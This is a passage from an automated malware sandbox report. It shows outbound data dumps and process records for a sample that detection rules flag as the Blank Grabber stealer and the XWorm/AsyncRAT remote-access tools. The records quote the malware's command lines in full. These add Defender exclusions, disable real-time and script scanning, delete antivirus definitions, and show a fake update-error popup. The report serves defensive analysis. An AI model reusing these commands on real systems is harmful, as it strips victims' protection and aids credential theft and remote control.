                                                                                                                                                                                                                              2024-10-13 17:01:51 UTC16384OUTData Raw: cf 88 7d 86 8b b3 65 e1 92 90 db c0 64 89 cb 96 8e b2 6a 1a 2c de 11 fc 87 0d d7 bc 7e ee 9c 2b e9 11 cc f5 45 b8 ab 85 64 d0 4f 33 ed 91 59 ef 61 82 f2 df 79 f4 5a 3b 47 b4 fa 3f 20 40 e1 a0 3b de e2 a9 bb 0a a5 0d 55 a7 8d 66 a4 73 44 a1 5d 0a 37 04 bb 27 8b 75 1f 6b b6 c2 93 20 33 d5 35 be ed 74 f1 a5 9f 55 a4 31 bb b2 87 25 21 cd 86 2a 54 f5 f6 d2 e7 f6 2b e6 98 1b 15 f7 78 89 dc 23 b2 07 a8 98 5b 77 10 f3 72 f4 26 33 9b 45 ee a6 2a ae fa 87 95 d5 88 1b 17 81 d4 bc 3f 1e aa e7 56 b8 a4 2d 06 ef 99 8d bb 39 c1 42 af 60 87 dd bb 38 17 6f c7 d5 bc 22 33 50 1a bf af a7 13 4f 8b 19 97 08 51 69 f5 27 b5 56 f4 bb a0 3b 52 9d 38 e4 34 75 4a 94 20 28 1c 68 32 2d c3 0d 78 52 1a ac 24 b1 22 f0 b7 f1 bf 77 8a 96 b7 04 cc 8a 56 98 63 f9 67 af 3d e8 8c f6 d1 f7 3e
                                                                                                                                                                                                                              Data Ascii: }edj,~+EdO3YayZ;G? @;UfsD]7'uk 35tU1%!*T+x#[wr&3E*?V-9B`8o"3POQi'V;R84uJ (h2-xR$"wVcg=>
                                                                                                                                                                                                                              2024-10-13 17:01:51 UTC16384OUTData Raw: 5d 13 63 af 3b 92 05 6b 73 ef 53 28 b3 7c f2 2c f6 a5 1e 52 9a d9 7b 97 16 09 4e 57 5b 6e 6f 51 55 63 aa ee 9c 06 7e f3 1d ee 48 d8 e7 47 21 af f9 17 d7 d4 69 26 16 3b 0c e3 06 47 61 8d fa 00 2b 8e 4e 4f 60 2b b9 80 0a 8c f8 31 59 c4 32 41 07 2f 59 d3 91 76 65 4e eb fd ff 89 c9 02 a6 5f d2 a9 ee ee 88 e4 51 20 90 89 d3 b5 36 e5 48 11 4c 5e 73 66 64 e4 1b 29 3b 38 24 0d b6 77 51 06 8c 6b d2 0e cc d9 46 14 bd f7 3f a9 b5 12 a8 83 2a f6 f8 ee 56 59 f6 b9 88 fa 91 a4 f0 91 a0 44 f3 e3 47 78 37 65 1b f8 2e 0d 03 61 21 50 78 77 ba 16 60 d3 19 e3 de 26 88 17 66 ba 7f 7b 38 9a dc cc 75 2a c6 f7 c3 ab a3 19 1b 8d a3 32 53 0c 49 3f 67 cc f0 97 30 10 36 ae bb a6 55 79 15 4b b0 1a 5d 27 7d 4b 35 61 78 93 a2 f1 6c 4e 32 00 67 30 4c b8 6f 40 e4 a7 67 5a cd be a0 08 c4
                                                                                                                                                                                                                              Data Ascii: ]c;ksS(|,R{NW[noQUc~HG!i&;Ga+NO`+1Y2A/YveN_Q 6HL^sfd);8$wQkF?*VYDGx7e.a!Pxw`&f{8u*2SI?g06UyK]'}K5axlN2g0Lo@gZ
                                                                                                                                                                                                                              2024-10-13 17:01:51 UTC16384OUTData Raw: 97 f8 da 76 bd 17 4e b3 b1 ac 79 d1 62 4f 51 d6 35 6e f9 30 f2 11 64 c3 6f 11 f2 9d a2 e9 f7 28 68 4e 01 d3 52 23 8a 65 59 09 fc fe 67 b6 3c 24 95 0d ad 06 27 6b f7 18 2a 2d fe c5 4f 6e 8c 7e 63 0a 11 e4 8c 89 e0 1d 09 80 02 c8 36 1b bd 3d 04 e5 07 be 03 d6 bb d2 34 44 8e ac 62 af 2c aa dd 83 9a e3 8c b4 0a 1e 0d 38 68 a9 cb 82 e9 76 57 7d e5 f5 2c 56 ff 4c da bc 60 b1 2c d7 85 05 a9 b8 28 99 9c f1 8c 4c f7 87 d0 79 c9 45 68 1e a4 44 af 97 7c f9 5c 76 e6 e1 d6 e7 67 51 2d 45 6b ca c6 3f 0e 83 88 f1 44 dc 80 f3 9f d6 61 cf 24 c9 ea 8c ac 48 42 72 99 89 99 80 8d bb d8 5b 7a b8 93 db 97 38 18 06 03 c2 45 8c 51 1f 7a f2 5f cc 7b 24 76 4b 5c 10 7c ef be c5 d0 88 f4 30 34 2a 4d dd 93 65 42 f8 c1 b6 91 df b5 76 f4 ad a8 63 17 5e e0 25 56 d9 ce b5 3e 0e c3 cd 66
                                                                                                                                                                                                                              Data Ascii: vNybOQ5n0do(hNR#eYg<$'k*-On~c6=4Db,8hvW},VL`,(LyEhD|\vgQ-Ek?Da$HBr[z8EQz_{$vK\|04*MeBvc^%V>f
                                                                                                                                                                                                                              2024-10-13 17:01:51 UTC16384OUTData Raw: 4e b7 8f e5 fa ae 44 10 e9 58 d3 8f f2 61 00 b2 75 d0 03 a4 ce f7 1e 6b b1 f4 58 9f a8 8a 6f 5c 11 33 f7 c9 d4 fc 0c 91 ff 13 d1 1d ff be a9 31 8e 74 a4 a6 07 44 70 b0 e7 e9 aa 2b 29 52 cd a8 5b 5e f9 2e de 39 21 08 37 eb c4 9d e0 4a 74 16 06 5f 2a fd a1 e6 db 85 45 ef f7 91 3a cc 20 a3 9d 06 df a0 86 e0 91 b6 ab cb e8 e6 d1 ea d3 ec e6 3d d9 24 d5 b7 06 29 03 2d 4f 5d dc 72 51 c3 af 40 e9 0e d2 5d 38 6f 73 ef 66 ee d4 e5 44 fa 81 5b 64 6a 74 e5 54 20 da 4d 85 a4 12 e6 f3 b3 d5 08 19 ca 0a b3 d6 f8 1b 60 f3 fc d0 32 2c c9 ac eb 6b 0e 6a d8 9f 0b fd 78 51 a7 4b cf 1c 54 d5 fb 8e 50 37 04 4b 62 d2 29 4e 3b 25 97 10 35 4b f9 72 28 ba c1 57 8f 6b 6b 4a 59 4f 77 22 67 51 83 db 48 1d cd 85 34 d4 52 40 ad b3 87 c6 f6 b5 53 ec 2d 90 93 04 79 70 77 dd f9 4f 59 d9
                                                                                                                                                                                                                              Data Ascii: NDXaukXo\31tDp+)R[^.9!7Jt_*E: =$)-O]rQ@]8osfD[djtT M`2,kjxQKTP7Kb)N;%5Kr(WkkJYOw"gQH4R@S-ypwOY
                                                                                                                                                                                                                              2024-10-13 17:01:51 UTC16384OUTData Raw: f4 55 f5 04 8b e7 aa 08 19 cd 77 cb 02 16 4b 95 47 10 de 87 2f 68 8c 43 92 65 2d 0f 04 fb d2 79 2a b1 2a 71 96 a6 d7 4a 08 15 ee 54 26 89 43 b4 e2 e6 87 e6 1d 56 e7 ea 75 19 5b a9 e1 06 da a7 6d 56 6a f3 92 4b eb a1 23 56 dc 06 a8 dd 4c a7 1b e0 15 3f 42 2d e6 37 c6 21 3f 62 f6 ed a5 ec b3 0b 55 74 1b fb 9b f6 91 5c 19 ab 87 6f 87 87 fe 57 64 43 1d 90 4c c7 8c b4 4d 9a 97 a9 04 5a b7 17 3f b1 8a 2b bb 92 62 d7 e5 05 12 0a c5 64 80 d2 e4 7b 45 49 fa ba af b5 fc 44 be af 9e a7 1b 2c b3 b2 d9 c4 a8 4b 30 2b f1 66 84 0f 97 10 1c 54 16 03 ee ff 8b aa 82 00 1d 80 df 11 6d 9b fe e9 f2 bb b0 a2 e3 0d 9c e7 0d 11 f4 63 43 4c 2f 63 9a 91 e1 ec 9a 18 35 b8 0b 35 f4 e2 97 30 5a 20 d8 b8 58 99 d2 48 3b 7a cf e5 23 c5 79 1f aa 62 fc 06 c2 29 e2 df 9f 25 fb e6 32 5e 5f
                                                                                                                                                                                                                              Data Ascii: UwKG/hCe-y**qJT&CVu[mVjK#VL?B-7!?bUt\oWdCLMZ?+bd{EID,K0+fTmcCL/c550Z XH;z#yb)%2^_
                                                                                                                                                                                                                              2024-10-13 17:01:51 UTC16384OUTData Raw: 9d 57 f6 e7 27 cc 2b dd 8b 92 33 39 d8 91 ad 23 ae 00 5e c5 74 e6 85 e2 a7 03 f2 3b 9d 61 6a cb f4 d0 1c 7d ba 32 ac 25 94 46 00 c9 70 06 84 e8 47 61 12 94 18 6b ce 67 6a f4 06 2e 5a d7 98 bc af c1 1e 33 c1 ab b8 e5 a6 7b ce 11 90 0d bb 51 de f5 5b 6a 29 7e 88 4b 21 d3 a3 22 a0 07 ef 27 42 36 36 48 29 91 80 76 43 46 e2 6e 72 27 8d 54 01 37 f2 2b e8 f8 18 95 00 5f 32 f7 62 03 bc 52 07 c2 fa 94 ef 2c f8 5b 07 21 c4 6c 4f 2e 87 b7 c1 6c 02 08 92 e0 7f c2 f8 06 ee f5 38 97 38 ef 4c fd f7 d9 d7 f5 e0 77 62 b4 e3 45 95 eb b7 07 e3 2c a6 b2 f5 6a 0f 5a aa f0 13 21 5a 30 ee d1 f7 c4 fd 80 26 67 9d 7c 6f 70 3c 70 78 8f 09 24 5e 2e e8 b9 bc b9 57 72 f1 49 dc 95 31 39 34 c0 8a a5 9f e8 ef fd b9 68 9c c5 1a 43 0f 52 82 4f 42 f5 e8 6d 5e ac 1c 3a b1 7d 52 83 b4 60 04
                                                                                                                                                                                                                              Data Ascii: W'+39#^t;aj}2%FpGakgj.Z3{Q[j)~K!"'B66H)vCFnr'T7+_2bR,[!lO.l88LwbE,jZ!Z0&g|op<px$^.WrI194hCROBm^:}R`
                                                                                                                                                                                                                              2024-10-13 17:01:51 UTC16384OUTData Raw: 79 e9 6a 12 a0 b0 fc 6c 38 47 0c 17 54 75 35 c8 47 1a 39 2c 62 01 6d a5 9d 65 6e c2 dd bb cb 78 e8 53 b5 29 28 96 95 0f fa ce bb 91 80 2c da 9e 76 f5 0a b6 b6 e7 de 41 55 e2 c0 f8 ec f2 a8 01 af fc 38 0e c7 ea 11 d0 4a c5 c9 af 9f b5 5e 2f 59 92 76 b1 73 5f 38 c2 6b d8 03 66 fc cb e5 60 3a da f6 18 19 4e 03 c0 77 1a e4 23 c4 c8 8a 6a 92 8b 12 af 83 39 48 9a 71 9c d0 e6 a9 31 9e 7f ea 74 36 ae 4e de 51 c2 d7 ed b1 62 10 06 03 c2 0d 61 f6 5f cb 99 29 2e e6 1c f0 5b a4 9c 3f a1 3f 13 29 30 74 9e a4 f9 cb 14 1c d6 c4 a9 35 fa 4c dd 4a 38 35 b2 27 f3 21 19 c2 c4 24 44 e9 d8 ce 0e 39 bb 56 22 38 4a 23 63 e6 4c 69 89 1a 22 8d 19 55 bf ee 36 79 9c 37 e1 40 4d d9 d2 c1 0f 0f 5f 9c 0a 5b 6b b0 f5 f8 db 31 43 0e 81 e2 8f 77 fe 7a 22 fc 12 78 bc 1c 13 a0 c0 4b 3b 57
                                                                                                                                                                                                                              Data Ascii: yjl8GTu5G9,bmenxS)(,vAU8J^/Yvs_8kf`:Nw#j9Hq1t6NQba_).[??)0t5LJ85'!$D9V"8J#cLi"U6y7@M_[k1Cwz"xK;W
                                                                                                                                                                                                                              2024-10-13 17:01:52 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                                                              Date: Sun, 13 Oct 2024 17:01:52 GMT
                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                              Content-Length: 73
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                              Start time:13:01:08
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\sB2ClgrGng.exe"
                                                                                                                                                                                                                              Imagebase:0x7ff644870000
                                                                                                                                                                                                                              File size:7'962'066 bytes
                                                                                                                                                                                                                              MD5 hash:4667AD84B811400BABC982785614BB5F
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1761043255.000001D372114000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1761043255.000001D372112000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                              Start time:13:01:09
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\sB2ClgrGng.exe"
                                                                                                                                                                                                                              Imagebase:0x7ff644870000
                                                                                                                                                                                                                              File size:7'962'066 bytes
                                                                                                                                                                                                                              MD5 hash:4667AD84B811400BABC982785614BB5F
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1783258664.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000003.1833375883.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1783075658.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000003.1813675437.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1782963753.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                              Start time:13:01:11
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                              Start time:13:01:11
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                              Start time:13:01:11
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                              Start time:13:01:11
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                              Start time:13:01:11
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                              Start time:13:01:11
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "start bound.exe"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                              Start time:13:01:11
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                              Start time:13:01:11
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()""
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                              Start time:13:01:11
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                              Start time:13:01:11
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                              Start time:13:01:11
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                              Start time:13:01:11
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                              Start time:13:01:12
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()"
                                                                                                                                                                                                                              Imagebase:0x7ff6c00d0000
                                                                                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                                                                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                              Start time:13:01:12
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:bound.exe
                                                                                                                                                                                                                              Imagebase:0x2f0000
                                                                                                                                                                                                                              File size:68'096 bytes
                                                                                                                                                                                                                              MD5 hash:8D8BC4B4831CCCE11284D512630749C5
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000F.00000002.4216648760.0000000002617000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, Author: ditekSHen
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                              Start time:13:01:12
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                              Start time:13:01:12
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
